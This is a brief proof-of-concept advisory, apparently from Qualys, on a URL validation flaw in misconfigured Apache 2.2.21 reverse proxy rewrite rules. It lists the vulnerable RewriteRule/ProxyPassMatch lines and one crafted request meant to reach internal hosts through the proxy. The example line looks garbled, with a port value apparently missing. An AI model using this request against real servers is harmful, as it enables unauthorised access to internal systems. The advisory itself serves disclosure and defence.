Apache HTTP Server Reverse Proxy/Rewrite URL Validation Issue By Qualys

Proof of Concepts


Target:
Fully patched Apache Web Server (Version 2.2.21) with CVE-2011-3368
patch applied, with a reverse proxy set up and incorrectly configured
RewriteRule/ProxyPassMatch rules.


Rewrite rules in httpd.conf:
RewriteRule ^(.*) http://10.40.2.159$1
ProxyPassMatch ^(.*) http://10.40.2.159$1



Example 1:
GET @localhost:: HTTP/1.0\r\n\r\nwhere is any port